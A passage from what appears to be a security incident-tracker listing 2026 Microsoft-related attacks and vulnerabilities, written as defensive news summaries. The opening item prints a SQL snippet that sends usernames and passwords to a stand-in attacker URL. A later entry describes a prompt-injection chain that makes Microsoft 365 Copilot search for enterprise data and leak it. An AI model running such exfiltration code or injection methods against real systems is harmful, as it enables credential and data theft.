For example: ```sql DECLARE @payload NVARCHAR(MAX); SELECT @payload = (SELECT username, password FROM dbo.app_users FOR JSON AUTO); EXEC sp_invoke_external_rest_endpoint @url = N'https://attacker-server/collect', @method = 'POST', @payload = @payload; ``` Additionally, combining the REST endpoint feature with OPENROWSET enables file-level exfiltration, allowing attackers to read and transmit sensitive system files. Beyond direct data theft, SQL Server 2025 can be repurposed as a persistent exfiltration platform. By leveraging database triggers, attackers can automatically send newly inserted or updated records to remote servers in real time, enabling continuous credential harvesting or data leakage without manual intervention. The CREATE EXTERNAL MODEL feature introduces further risks by allowing attackers to coerce NTLM authentication over SMB. By specifying a malicious UNC path as the model location, SQL Server can be forced to authenticate against attacker-controlled infrastructure, facilitating credential capture or relay attacks. More sophisticated techniques involve abusing AI features to establish covert C2 channels. By registering an external model pointing to an attacker-controlled API and using AI_GENERATE_EMBEDDINGS as a communication mechanism, adversaries can issue commands and receive responses disguised as legitimate AI traffic. This blending of malicious activity with normal AI workflows complicates detection, particularly in environments where outbound HTTPS traffic from database servers is now considered routine. The integration of AI capabilities into SQL Server 2025 marks a shift in enterprise database security, as historically suspicious outbound traffic is now normalized. Traditional detection strategies may prove less effective, requiring defenders to reassess security baselines, monitor high-risk feature usage, and restrict outbound network access from database servers. The findings highlight a broader trend: as AI becomes embedded in core enterprise software, it introduces new avenues for exploitation if not properly secured.
INCIDENT DETAILS -
TYPE
Data Exfiltration
IMPACT
Data Compromised: Sensitive data (e.g., usernames, passwords, system files)Systems Affected: Microsoft SQL Server 2025 instances with AI features enabledOperational Impact: Potential unauthorized data access and exfiltrationBrand Reputation Impact: Potential erosion of trust in Microsoft SQL Server 2025 securityIdentity Theft Risk: High (if PII is exfiltrated)Payment Information Risk: High (if payment data is exfiltrated)
DATA BREACH
Personally Identifiable Information (PII)Credentials (usernames, passwords)System filesSensitivity Of Data: HighData Exfiltration: Yes (via HTTPS to attacker-controlled infrastructure)Personally Identifiable Information: Potential (if stored in compromised tables)
JUNE 2026
166Before Incident
Cyber Attack
11 Jun 2026Microsoft Security
Spotify, Adobe and Microsoft: Hackers are using TikTok videos offering 'free Spotify Premium' to spread malware and steal passwords

TikTok and Instagram Reels Exploited to Spread Password-Stealing Malware

150After Incident
CRITICAL-16
SPOMICADO1781202325
TikTok and Instagram Reels Exploited to Spread Password-Stealing Malware A recent report from ReversingLabs reveals a surge in malicious campaigns on short-form video platforms like TikTok and Instagram Reels, targeting users with fake offers for free subscriptions to services such as Spotify Premium, Microsoft Office, and Adobe. The scams lure cash-strapped users by promising cost-saving alternatives amid economic pressures. Instead of traditional phishing emails, attackers instruct victims to open command-line tools like PowerShell and execute a provided command. This action downloads and installs Vidar, an infostealer malware that harvests usernames, passwords, cookies, session tokens, cryptocurrency wallet data, and personal files. Unlike conventional phishing, which relies on a single click, this method requires victims to manually input commands, making it a more patient and targeted approach. Researchers note that the shift to social media platforms allows threat actors to drive traffic to attacker-controlled websites, increasing the reach of their campaigns. The attack underscores the persistent effectiveness of social engineering, particularly as users seek free or discounted alternatives to paid services. While basic security measures like multi-factor authentication can mitigate risks, the evolving tactics highlight the need for vigilance against seemingly legitimate offers.
INCIDENT DETAILS -
TYPE
Malware Distribution
MOTIVATION
Financial Gain (Data Theft for Sale or Exploitation)
IMPACT
Data Compromised: Usernames, passwords, cookies, session tokens, cryptocurrency wallet data, personal filesSystems Affected: User devices (via malware installation)Identity Theft Risk: HighPayment Information Risk: High (if cryptocurrency wallets are compromised)
DATA BREACH
Type Of Data Compromised: Credentials, Session Tokens, Cryptocurrency Wallet Data, Personal FilesSensitivity Of Data: HighData Exfiltration: YesPersonally Identifiable Information: Yes
JUNE 2026
169Before Incident
Vulnerability
09 Jun 2026Microsoft Security
Microsoft: PoC Released for Microsoft Exchange Server EWS InstallApp SSRF Vulnerability

Microsoft Exchange SSRF Vulnerability (CVE-2026-45502) Exploit Released

166After Incident
LOW-3
MIC1782296659
Microsoft Exchange SSRF Vulnerability (CVE-2026-45502) Exploit Released A proof-of-concept (PoC) exploit has been published for CVE-2026-45502, a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server’s Exchange Web Services (EWS). The flaw affects Exchange Server 2016 (CU23), 2019 (CU14 and CU15), and the Subscription Edition (RTM), allowing authenticated mailbox users to manipulate the ManifestUrl parameter in an InstallApp SOAP request to force the server to send HTTP requests to attacker-controlled internal or external endpoints. Microsoft rates the vulnerability as medium severity (CVSS 3.1: 5.0), though a CVSS 4.0 assessment lowers it to 2.3 (low). The issue stems from insufficient URL validation in the SynchronousDownloadData.DownloadDataFromUri() function, which processes user-supplied ManifestUrl values during EWS add-in installations. In on-premises deployments, a logic error where the isBposUser flag is always false disables internal-address blocking, enabling the server to trust arbitrary URLs. Exploiting this flaw turns Exchange into a network proxy, allowing access to internal HTTP services, metadata endpoints (e.g., 169.254.169.254), and other restricted resources. While the SSRF is largely blind, researchers demonstrated that HTTP error codes and timing can be used for internal reconnaissance, potentially chaining with other vulnerabilities. A PoC workflow was released, showing how an attacker can send a crafted EWS InstallApp request with a ManifestUrl pointing to an attacker-controlled listener, confirming the SSRF when the Exchange server initiates a callback. Microsoft patched CVE-2026-45502 in the June 9, 2026 Patch Tuesday (KB5094139), replacing the flawed isBposUser logic with a feature-flag-driven model and introducing ManifestUrlCheck, an allowlist restricting connections to trusted domains like officeclient.microsoft.com. Organizations must ensure their Exchange servers are updated to the fixed versions to mitigate risk. Defenders are advised to restrict outbound connectivity from Exchange servers, monitor for anomalous HTTP traffic, and enforce strict access controls on EWS endpoints, as valid credentials are required for exploitation.
INCIDENT DETAILS -
TYPE
SSRF (Server-Side Request Forgery)
IMPACT
Systems Affected: Microsoft Exchange Server 2016 (CU23), 2019 (CU14, CU15), Subscription Edition (RTM)Operational Impact: Exchange server can be used as a network proxy for internal reconnaissance
JUNE 2026
169Before Incident
Vulnerability
02 Jun 2026Microsoft Security
GitHub: 1-Click GitHub Token Vulnerability Lets Attackers Steal Users’ OAuth Tokens

Critical VSCode Webview Vulnerability Exposes GitHub OAuth Tokens in One Click

166After Incident
CRITICAL-3
GIT1780453444
Critical VSCode Webview Vulnerability Exposes GitHub OAuth Tokens in One Click On June 2, 2026, security researcher Ammar Askar publicly disclosed a severe vulnerability in Visual Studio Code’s (VSCode) webview implementation that allows attackers to steal GitHub OAuth tokens granting full read/write access to a victim’s private repositories with a single malicious link click. The flaw affects both the browser-based github.dev editor and the desktop version of VSCode, though the latter requires the victim to open a malicious repository. ### How the Exploit Works The attack exploits VSCode’s webview security model, which isolates untrusted content in sandboxed `<iframe>` elements. However, a design flaw in the `Window.postMessage()` API used to forward keyboard events between webviews and the main editor enables malicious JavaScript to simulate keystrokes. By chaining five VSCode behaviors, an attacker can: 1. Trigger arbitrary JavaScript via a malicious Jupyter Notebook (`.ipynb`) file or a crafted `.vscode/extensions.json` file. 2. Silently install a malicious extension by dispatching a synthetic `Ctrl+Shift+A` keystroke to bypass notification prompts. 3. Bypass publisher trust checks by placing the extension in the local `.vscode/extensions/` directory, exploiting github.dev’s default "trusted workspace" setting. 4. Access the preloaded GitHub OAuth token, which is unscoped and grants access to all of a user’s repositories not just the opened one. 5. Exfiltrate the token and repository list via API requests to `api.github.com`, enabling full control over private code. On github.dev, the attack requires no further interaction beyond the initial link click. On the desktop version, the exploit can escalate to Remote Code Execution (RCE) due to VSCode extensions’ unrestricted Node.js API access. ### Impact and Mitigations The vulnerability poses a significant risk, as stolen OAuth tokens allow attackers to read, modify, or push code to any private repository the victim can access. Since github.dev lacks CSRF protections, any external link can redirect users into the attack. Temporary mitigations include: - Clearing github.dev site data in browsers to re-enable a warning dialog. - Avoiding untrusted github.dev links until a patch is released. - Auditing and removing unrecognized extensions in github.dev. ### Defense-in-Depth Limitations VSCode’s security measures, such as strict Content Security Policies (CSP) and DOMPurify for Markdown sanitization, partially contained the exploit’s scope. However, Askar’s full disclosure published without prior coordination with Microsoft highlights persistent concerns about the MSRC’s vulnerability handling. GitHub was notified one hour before the public release.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: GitHub OAuth tokens, private repository code, repository listsSystems Affected: VSCode (desktop and browser-based github.dev), GitHub repositoriesOperational Impact: Unauthorized access to private repositories, potential code modification or theft, remote code execution (desktop version)Brand Reputation Impact: High (Microsoft/VSCode and GitHub reputation for security)
DATA BREACH
Type Of Data Compromised: Authentication tokens (GitHub OAuth), repository code, repository metadataSensitivity Of Data: High (OAuth tokens grant full repository access, private code)Data Exfiltration: Yes (via api.github.com)File Types Exposed: Jupyter Notebooks (.ipynb), VSCode extension files (.vscode/extensions.json)
JUNE 2026
173Before Incident
Vulnerability
01 Jun 2026Microsoft Security
Microsoft: Microsoft 365 Copilot Vulnerability Exposes Sensitive Data Through One-Click Attack

Microsoft 365 Copilot Vulnerable to 'SearchLeak' One-Click Data Exfiltration Attack

166After Incident
CRITICAL-7
MIC1781591215
Microsoft 365 Copilot Vulnerable to "SearchLeak" One-Click Data Exfiltration Attack Researchers at Varonis Threat Labs uncovered a critical vulnerability in Microsoft 365 Copilot Enterprise Search, tracked as CVE-2026-42824, enabling attackers to exfiltrate sensitive enterprise data with a single click. The flaw, dubbed "SearchLeak," combines AI-specific prompt injection with traditional web vulnerabilities to bypass security controls. The attack exploits a three-stage exploit chain: 1. Parameter-to-Prompt (P2P) Injection – Copilot’s URL query parameter is interpreted as executable instructions, allowing attackers to embed malicious prompts that force the AI to retrieve confidential data (e.g., MFA codes, emails, SharePoint/OneDrive files). 2. HTML Injection Race Condition – While Microsoft sanitizes AI responses by wrapping them in code blocks, a timing flaw allows injected HTML (e.g., image tags) to render before protection applies, enabling outbound data leakage. 3. Server-Side Request Forgery (SSRF) via Bing – Attackers bypass browser security policies by embedding exfiltrated data in a Bing image search URL, leveraging Microsoft’s trusted infrastructure to transmit stolen information. In a real-world scenario, victims receive a seemingly legitimate Microsoft link (via email, Teams, or Slack). Upon clicking, Copilot executes the hidden prompt, searches enterprise data, and silently exfiltrates sensitive content all without requiring further interaction. Since the attack originates from a trusted domain, traditional phishing defenses fail to block it. The impact is severe, particularly in enterprise environments where Copilot integrates with organizational data. Attackers can access emails, meeting details, financial reports, and strategic documents, all while operating under the victim’s session permissions without triggering security alerts. Microsoft has patched the vulnerability, but SearchLeak underscores broader risks in AI-driven systems. By bridging prompt injection with legacy flaws like race conditions and SSRF, the attack demonstrates how AI can expand attack surfaces, turning productivity tools into data exfiltration channels. The discovery follows prior AI vulnerabilities (e.g., "Reprompt") and highlights the need for stricter input validation, real-time output sanitization, and AI-specific threat modeling.
INCIDENT DETAILS -
TYPE
Data Exfiltration
IMPACT
Data Compromised: Emails, meeting details, financial reports, strategic documents, MFA codes, SharePoint/OneDrive filesSystems Affected: Microsoft 365 Copilot Enterprise SearchOperational Impact: Data exfiltration without triggering security alerts, bypassing traditional phishing defensesBrand Reputation Impact: Potential erosion of trust in AI-driven productivity toolsIdentity Theft Risk: High (access to personally identifiable information)
DATA BREACH
EmailsMeeting detailsFinancial reportsStrategic documentsMFA codesSharePoint/OneDrive filesSensitivity Of Data: High (confidential enterprise data, personally identifiable information)
JUNE 2026
189Before Incident
Cyber Attack
31 May 2026Microsoft Security
Nvidia, Okta, Microsoft and AT&T: Pink is the latest goon squad to use fake helpdesk calls to steal creds

New Extortion Group 'Pink' Targets Organizations with Vishing and Cloud Data Theft

169After Incident
CRITICAL-20
OKTMICATTNVI1780611852
New Extortion Group "Pink" Targets Organizations with Vishing and Cloud Data Theft A recently identified extortion group, tracked as Pink, is leveraging voice phishing (vishing) and fake IT help-desk calls to infiltrate corporate networks, steal sensitive data, and demand ransom payments. First detected by Palo Alto Networks’ Unit 42, the group classified as cluster CL-CRI-1147 launched its data-leak site on May 31, 2026. Pink’s tactics mirror those of other cybercriminal collectives, including Lapsus$, Scattered Spider, and ShinyHunters, which have previously targeted high-profile organizations like Nvidia, Microsoft, Okta, MGM Resorts, and AT&T. These groups typically impersonate IT staff or employees to phish credentials and bypass multi-factor authentication (MFA), then exfiltrate data from cloud storage platforms such as SharePoint and OneDrive. Unit 42 analysts linked Pink to The Com, a loosely organized network of hackers, SIM swappers, and extortionists, some of whom have ties to violent crime. After monitoring multiple extortion attacks, researchers observed Pink’s operators re-engaging with a victim on June 1, 2026, via a free webmail account, providing a new qTox ID and a leak site under the Pink brand. The group sets a 72-hour deadline for ransom negotiations before leaking stolen data. Once inside a victim’s environment, Pink exfiltrates files and uses compromised accounts to send internal extortion messages via Microsoft Teams. The group reuses second-level domains for phishing, tailoring third-level domains to specific targets. Indicators of compromise include the domains passkeyadd[.]com, passkeydeploy[.]com, and deploypasskey[.]com, as well as IP addresses 185[.]178.208[.]153, 172[.]93.100[.]252, and 96[.]232.20[.]66. Observed user-agent strings during data exfiltration include Microsoft.Graph.Client/5.62.0 and python-requests/2.28.1.
INCIDENT DETAILS -
TYPE
Extortion, Data Theft, Vishing
MOTIVATION
Financial gain, data extortion
IMPACT
Data Compromised: Sensitive data, cloud storage files (SharePoint, OneDrive)Systems Affected: Corporate networks, cloud storage platformsOperational Impact: Internal extortion messages via Microsoft Teams, data exfiltrationIdentity Theft Risk: High (due to data exfiltration)
DATA BREACH
Type Of Data Compromised: Sensitive data, cloud storage filesSensitivity Of Data: High (personally identifiable information likely)
MAY 2026
207Before Incident
Cyber Attack
20 May 2026Microsoft Security
Microsoft: Blog

Large-Scale Credential Theft Campaign Targeting Global Organizations

184After Incident
CRITICAL-23
MIC1779258738
Microsoft Warns of Large-Scale Credential Theft Campaign Targeting Global Organizations Microsoft has issued a warning about an ongoing credential theft campaign impacting 35,000 users across 13,000 organizations in 26 countries. The attack, which remains active, appears to be a coordinated effort to harvest login credentials, potentially for further exploitation, including data breaches, lateral movement, or ransomware deployment. While Microsoft has not disclosed specific attack vectors or threat actors, the scale of the campaign underscores the persistent risk of credential-based attacks, which remain a favored tactic for cybercriminals and state-sponsored groups. Organizations are advised to monitor for unusual authentication attempts, enforce multi-factor authentication (MFA), and review access logs for signs of compromise. The incident highlights the critical need for robust identity and access management (IAM) controls, as well as continuous threat detection to mitigate the fallout from stolen credentials. Further details on the attack’s methodology and affected sectors are expected as investigations progress.
INCIDENT DETAILS -
TYPE
Credential Theft
IMPACT
Data Compromised: Login credentialsIdentity Theft Risk: High
DATA BREACH
Type Of Data Compromised: Login credentialsNumber Of Records Exposed: 35,000Sensitivity Of Data: High
Vulnerability
20 May 2026Microsoft Security
Microsoft: Microsoft Releases Mitigation for Windows BitLocker Security Bypass 0-Day Vulnerability

Critical Windows BitLocker Zero-Day Vulnerability Exposes Encrypted Data via Physical Access

184After Incident
CRITICAL-23
MIC1779272687
Critical Windows BitLocker Zero-Day Vulnerability Exposes Encrypted Data via Physical Access Microsoft has revealed a severe zero-day vulnerability in Windows BitLocker (CVE-2026-45585) that allows attackers with physical access to bypass full-disk encryption, potentially exposing sensitive data in minutes. Disclosed on May 19, 2026, the flaw is rated "Exploitation More Likely" by Microsoft, though no active attacks have been confirmed. The vulnerability, classified as a Security Feature Bypass with an "Important" severity rating, resides in the Windows Recovery Environment (WinRE) and is linked to the "YellowKey" exploit chain, published on GitHub by researcher Nightmare-Eclipse. By injecting a malicious binary (autofstx.exe) into the BootExecute registry value, attackers can execute code before the OS loads, circumventing BitLocker’s pre-boot authentication without requiring credentials or decryption keys. Affected Systems: - Windows 11 - Windows Server 2022 - Windows Server 2025 No patch is available yet, but Microsoft has released a six-step manual mitigation process to modify the WinRE image, including mounting the recovery environment, editing the registry, and re-establishing BitLocker trust. Additionally, Microsoft recommends upgrading from TPM-only to TPM+PIN BitLocker protectors to reduce risk, enforceable via PowerShell, Command Prompt, or Group Policy. The public availability of the YellowKey exploit lowers the barrier for attackers, increasing risks for lost or stolen enterprise devices. Security teams managing affected systems are advised to prioritize WinRE remediation and enforce TPM+PIN policies ahead of an official patch.
INCIDENT DETAILS -
TYPE
Security Feature Bypass
IMPACT
Data Compromised: Sensitive encrypted dataSystems Affected: Windows devices with BitLocker encryptionOperational Impact: Potential unauthorized access to encrypted dataBrand Reputation Impact: Potential reputational damage for Microsoft and affected organizationsIdentity Theft Risk: High (if PII is exposed)Payment Information Risk: High (if financial data is exposed)
DATA BREACH
Type Of Data Compromised: Encrypted data (potentially sensitive)Sensitivity Of Data: High (if decrypted)Data Encryption: Bypassed (BitLocker encryption circumvented)Personally Identifiable Information: Potential (if PII is stored on affected devices)
MAY 2026
230Before Incident
Cyber Attack
18 May 2026Microsoft Security
AnyDesk, Putty, Microsoft and Webex: Microsoft disrupts Fox Tempest malware-signing-as-a-service platform tied to ransomware gangs

Microsoft Disrupts Fox Tempest Malware-Signing-as-a-Service Operation

207After Incident
CRITICAL-23
PUTWEBANYMIC1779215753
Microsoft Disrupts Fox Tempest Malware-Signing-as-a-Service Operation Microsoft has dismantled Fox Tempest, a sophisticated malware-signing-as-a-service (MSaaS) operation that enabled cybercriminals to bypass security defenses by making malicious software appear legitimate. The takedown, revealed in a U.S. District Court filing on Tuesday, targeted a service active since May 2025 that weaponized Microsoft’s Artifact Signing system designed to verify software authenticity to distribute malware and ransomware. Cybercriminals, including affiliates of Rhysida, INC, Qilin, and Akira, used Fox Tempest to obtain fraudulent code-signing certificates, allowing malware to evade detection. The service provided short-lived certificates that mimicked trusted software like AnyDesk, Teams, Putty, and Webex, tricking users and security tools into executing malicious payloads. Microsoft’s investigation found that the group created over 1,000 certificates and established hundreds of Azure tenants to support its operations. The disruption included seizing Fox Tempest’s website, taking down virtual machines, and revoking compromised certificates. Evidence showed cybercriminals complaining about the takedown, with some ransomware affiliates losing access to critical attack tools. Microsoft’s Digital Crimes Unit linked the service to the distribution of malware families such as Oyster, Lumma Stealer, and Vidar, delivered via malicious ads and fake download sites. Fox Tempest operated as a well-resourced criminal enterprise, with dedicated teams for infrastructure, customer support, and financial transactions. Cryptocurrency analysis revealed the group earned millions of dollars from ransomware affiliates, with attacks targeting organizations in the U.S., China, France, and India. Unlike lower-cost cybercrime services, Fox Tempest charged thousands per operation, reflecting the growing sophistication of the cybercriminal ecosystem. The takedown highlights how code-signing abuse undermines trust in digital security, allowing attackers to bypass defenses by masquerading as legitimate software. Microsoft’s actions aim to increase the cost of cybercrime by disrupting critical infrastructure used in large-scale attacks.
INCIDENT DETAILS -
TYPE
Malware-Signing-as-a-Service (MSaaS) Disruption
MOTIVATION
Financial gainCybercrime enablement
IMPACT
Financial Loss: Millions of dollars earned by Fox TempestOperational Impact: Disruption of ransomware and malware distribution operationsBrand Reputation Impact: Undermines trust in digital security and code-signing systems
MAY 2026
231Before Incident
Vulnerability
13 May 2026Microsoft Security
Microsoft: Microsoft Patches Critical Zero-Click Outlook Vulnerability Threatening Enterprises

Critical Zero-Click Outlook Vulnerability Patched in Microsoft’s Latest Update

228After Incident
CRITICAL-3
MIC1778682772
Critical Zero-Click Outlook Vulnerability Patched in Microsoft’s Latest Update Microsoft’s June Patch Tuesday addressed 137 vulnerabilities, including a severe zero-click remote code execution (RCE) flaw in Outlook, tracked as CVE-2026-40361. The vulnerability, reported by security researcher Haifei Li developer of the zero-day detection system Expmon affects a shared DLL used by both Outlook and Word, enabling exploitation without user interaction. Li described the flaw as a use-after-free bug that triggers automatically when a victim reads or previews a malicious email, bypassing the need for clicks or attachments. Since the vulnerability resides in Outlook’s email rendering engine, traditional mitigations such as blocking attachments or links are ineffective. However, forcing Outlook to display emails in plain text could reduce risk. The researcher warned that the flaw mirrors CVE-2015-6172 (BadWinmail), a decade-old Outlook vulnerability he dubbed an “enterprise killer” due to its ability to compromise high-profile targets (e.g., CEOs or CFOs) via a single email. Like its predecessor, CVE-2026-40361 evades enterprise firewalls, delivering threats directly to inboxes. Microsoft rated the vulnerability as "exploitation more likely," though Li noted he only developed a proof-of-concept (PoC) rather than a fully weaponized exploit. While crafting a functional exploit may be challenging, Li cautioned that threat actors’ ingenuity should not be underestimated. The patch is critical for organizations relying on Outlook and Exchange Server environments.
INCIDENT DETAILS -
TYPE
Zero-Click Remote Code Execution (RCE)
IMPACT
Systems Affected: Microsoft Outlook, Microsoft Word, Exchange Server environments
MAY 2026
239Before Incident
Vulnerability
12 May 2026Microsoft Security
Microsoft: Microsoft Teams Vulnerability Allows Hackers to Perform Spoofing Attacks

Microsoft Teams Android Vulnerability (CVE-2026-32185) Exposes Users to Spoofing Attacks

228After Incident
LOW-11
MIC1778646305
Microsoft Teams Android Vulnerability (CVE-2026-32185) Exposes Users to Spoofing Attacks On May 12, 2026, Microsoft disclosed CVE-2026-32185, a security flaw in Microsoft Teams for Android that could enable attackers to spoof local devices and manipulate trusted application elements. The vulnerability was revealed as part of Microsoft’s May 2026 Patch Tuesday updates. The issue stems from improper file and directory access controls in Teams, allowing unauthorized local attackers to impersonate legitimate content and deceive users into interacting with malicious communications. While exploitation requires user interaction and is confined to a local attack vector, the flaw poses a high risk to data confidentiality, particularly in enterprise environments. With a CVSS 3.1 base score of 5.5 (adjusted environmental score: 4.8) and a severity rating of Important, the vulnerability does not require elevated privileges, lowering the barrier for exploitation in shared or compromised local environments. Microsoft’s assessment categorizes the flaw as "Exploitation Less Likely", and no active exploitation or proof-of-concept code has been confirmed. The vulnerability affects Microsoft Teams for Android, with the patched version (1.0.0.2026092103) available via the Google Play Store. Microsoft has released an official fix, and users are advised to update immediately. Security researcher Ofek Levin of Enclave is credited with responsibly disclosing the issue. Organizations using Teams in regulated or high-security environments, particularly on mobile devices, should prioritize applying the patch to mitigate potential risks.
INCIDENT DETAILS -
TYPE
Spoofing
IMPACT
Data Compromised: Data confidentialitySystems Affected: Microsoft Teams for Android
DATA BREACH
Sensitivity Of Data: High (enterprise environments)
Vulnerability
12 May 2026Microsoft Security
Microsoft: Microsoft 365 Android Apps Account Takeover Vulnerability Impacted Billions of Android Users

Microsoft 365 Android Apps Exposed to Silent Account Takeover via Forgotten Debug Flag

228After Incident
CRITICAL-11
MIC1780475036
Microsoft 365 Android Apps Exposed to Silent Account Takeover via Forgotten Debug Flag A critical vulnerability, dubbed FlagLeft, allowed any third-party Android app to silently steal Microsoft account tokens from six major Microsoft 365 apps Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop, and OneNote without user interaction or consent. The flaw stemmed from a single debug flag, `setIsDebugMode(true)`, mistakenly left active in production code, disabling a critical authorization check in Microsoft’s shared SDK. The issue bypassed the Family of Client IDs (FOCI) token-sharing mechanism, which normally enables seamless single sign-on across Microsoft apps. With the debug flag enabled, any co-installed app could request and receive long-lived, refreshable tokens, granting attackers access to emails, OneDrive files, calendar data, and more all under the victim’s identity. Microsoft Teams was unaffected, as its debug flag was correctly disabled. Discovered by researchers at Enclave and Ofek Levin, the vulnerability exposed billions of Android users globally, with no visible indicators of compromise. Microsoft assigned multiple CVEs, including CVE-2026-41100 (Copilot, CVSS 4.4), CVE-2026-41101 (Word, CVSS 7.1), CVE-2026-41102 (PowerPoint, CVSS 7.1), and CVE-2026-41099 (Office for Android, CVSS 7.7), all classified under CWE-284: Improper Access Control. Microsoft patched all affected apps on May 12, 2026, requiring users to update to the latest versions. Enterprise administrators were advised to verify deployments and monitor OAuth token activity for anomalies. The incident highlighted how a single overlooked development artifact could undermine an entire authentication framework, with a shared SDK amplifying the risk across multiple high-profile apps. Enclave’s AI-assisted analysis played a key role in mapping the vulnerability’s full scope.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: Microsoft account tokens, emails, OneDrive files, calendar dataSystems Affected: Microsoft 365 Android apps (Word, PowerPoint, Excel, Copilot, Loop, OneNote)Operational Impact: Potential unauthorized access to sensitive data and accountsBrand Reputation Impact: High (global exposure, no visible indicators of compromise)Identity Theft Risk: High (account takeover, access to PII)
DATA BREACH
Type Of Data Compromised: Authentication tokens, emails, files, calendar dataSensitivity Of Data: High (personally identifiable information, corporate data)Personally Identifiable Information: Yes (account data, emails, files)
MAY 2026
250Before Incident
Cyber Attack
01 May 2026Microsoft Security
Azure, Microsoft, GitHub and MicrosoftDocs: Miasma Worm Hits 73 Microsoft GitHub Repositories in Major Supply Chain Attack

Microsoft GitHub Repositories Hit by Miasma Supply Chain Attack

235After Incident
CRITICAL-15
MICMICMICGIT1780813480
Microsoft GitHub Repositories Hit by Miasma Supply Chain Attack Microsoft’s GitHub repositories have been targeted in the ongoing Miasma self-replicating supply chain attack, affecting 73 repositories across four organizations Azure, Azure-Samples, Microsoft, and MicrosoftDocs. GitHub has disabled access to the compromised repositories, displaying a terms-of-service violation notice for affected projects, including Azure/azure-functions-host. Among the impacted repositories are key projects such as durabletask (and its related .NET, Go, JavaScript, and MSSQL implementations), azure-search-openai-demo-purviewdatasecurity, and windows-driver-docs. Notably, the durabletask PyPI package was previously compromised by TeamPCP in May to distribute an information stealer on Linux systems, suggesting the same threat actors may still retain access. Miasma, a variant of the Mini Shai-Hulud worm released by TeamPCP in mid-2026, has evolved its tactics, infecting additional packages in recent days. Attackers have created new repositories with deceptive descriptions like "Miasma: The Spreading Blight" and "Hades - The End for the Damned", with 95 such repositories identified so far. The campaign has also bypassed traditional registry-based attacks, directly injecting malicious code into repositories like icflorescu/mantine-datatable and related projects. The payload a 4.3 MB runner executes automatically when developers open affected repositories in AI coding tools such as Claude Code, Gemini CLI, Cursor, or VS Code, or via the npm test script. Security researchers highlight that Miasma exploits the trust model underpinning open-source ecosystems, propagating through legitimate channels without relying on platform vulnerabilities. By compromising maintainer credentials and mimicking routine updates, the attack evades conventional defenses, making it one of the most persistent and far-reaching supply chain campaigns to date.
INCIDENT DETAILS -
TYPE
Supply Chain Attack
IMPACT
Systems Affected: GitHub repositories, AI coding tools (Claude Code, Gemini CLI, Cursor, VS Code)Operational Impact: Disabled access to compromised repositories, terms-of-service violation noticesBrand Reputation Impact: Potential erosion of trust in open-source ecosystems and Microsoft's GitHub repositories
APRIL 2026
254Before Incident
Vulnerability
29 Apr 2026Microsoft Security
CISA, Microsoft and Linux Kernel: Exploitation of ‘Copy Fail’ Linux Vulnerability Begins

Linux Kernel Vulnerability 'Copy Fail' Exploited in the Wild, CISA Warns

250After Incident
CRITICAL-4
LINCISMIC1777934528
Linux Kernel Vulnerability "Copy Fail" Exploited in the Wild, CISA Warns The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert about active exploitation of CVE-2026-31431, a critical Linux kernel vulnerability dubbed Copy Fail. The flaw, present in all Linux distributions since 2017, allows authenticated attackers with code execution privileges to escalate to root access by manipulating the kernel’s AEAD template. Disclosed on April 29, the bug was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on Friday, with federal agencies directed to patch within two weeks. While exploitation remains limited primarily involving proof-of-concept (PoC) testing Microsoft warns of its broad applicability and the release of a working exploit, heightening risks for defenders. The vulnerability enables full root privilege escalation, posing severe threats to confidentiality, integrity, and availability. Attackers can leverage it for container breakout, multi-tenant compromise, and lateral movement in shared environments. Its stealthy in-memory exploitation and cross-platform compatibility make it particularly dangerous in cloud, CI/CD, and Kubernetes setups, where untrusted code execution is common. Exploitation requires only local, unprivileged access and can be chained with SSH, malicious CI jobs, or container access to achieve root shell. An attack typically begins with reconnaissance to identify vulnerable kernels, followed by a script to overwrite in-memory data and escalate privileges. Microsoft advises organizations to prioritize patching, isolate vulnerable systems, enforce access controls, and monitor logs for signs of compromise. The flaw’s decade-long presence underscores the ongoing risks of long-undetected kernel vulnerabilities in critical infrastructure.
INCIDENT DETAILS -
TYPE
Privilege Escalation
IMPACT
Systems Affected: All Linux distributions since 2017Operational Impact: Container breakout, multi-tenant compromise, lateral movement
APRIL 2026
257Before Incident
Vulnerability
28 Apr 2026Microsoft Security
Microsoft and Federal Civilian Executive Branch agencies: CISA Warns Microsoft Windows Shell 0-click Vulnerability Exploited in Attacks

CISA Issues Urgent Warning for Actively Exploited Windows Zero-Day Vulnerability (CVE-2026-32202)

250After Incident
CRITICAL-7
MICFED1777465711
CISA Issues Urgent Warning for Actively Exploited Windows Zero-Day Vulnerability The Cybersecurity and Infrastructure Security Agency (CISA) has added a critical zero-day vulnerability in Microsoft Windows to its Known Exploited Vulnerabilities (KEV) catalog, following confirmed real-world attacks. Tracked as CVE-2026-32202, the flaw affects the Windows Shell, a core component managing the operating system’s graphical interface. The vulnerability stems from a protection mechanism failure (CWE-693), allowing attackers to conduct network spoofing disguising malicious activity as trusted communications. Successful exploitation enables threat actors to intercept sensitive data, bypass access controls, or deceive users with fake prompts, potentially serving as an initial foothold for broader attacks. While it remains unclear whether ransomware groups have adopted this exploit, spoofing techniques are commonly used to bypass defenses, escalate privileges, or move laterally within compromised networks. Cybersecurity teams are actively monitoring its weaponization in the wild. CISA has mandated that Federal Civilian Executive Branch agencies patch or mitigate the flaw by May 12, 2026, though all organizations including private-sector and critical infrastructure operators are strongly urged to prioritize updates. Microsoft has released official patches, and CISA recommends immediate deployment, alongside traffic monitoring for spoofing attempts. If mitigations are unavailable, discontinuing use of the affected component is advised. The addition to the KEV catalog underscores the global security risk posed by this actively exploited flaw.
INCIDENT DETAILS -
TYPE
Zero-Day Vulnerability Exploitation
IMPACT
Data Compromised: Sensitive data interceptionSystems Affected: Microsoft Windows (Windows Shell component)Operational Impact: Bypass of access controls, lateral movement within networks
DATA BREACH
Type Of Data Compromised: Sensitive dataSensitivity Of Data: High
APRIL 2026
272Before Incident
Cyber Attack
24 Apr 2026Microsoft Security
Microsoft: Hackers Exploit Microsoft Teams to Breach Organizations While Posing as IT Helpdesk Staff

UNC6692 Threat Group Exploits Microsoft Teams in Sophisticated Social Engineering Attack

256After Incident
CRITICAL-16
MIC1777019139
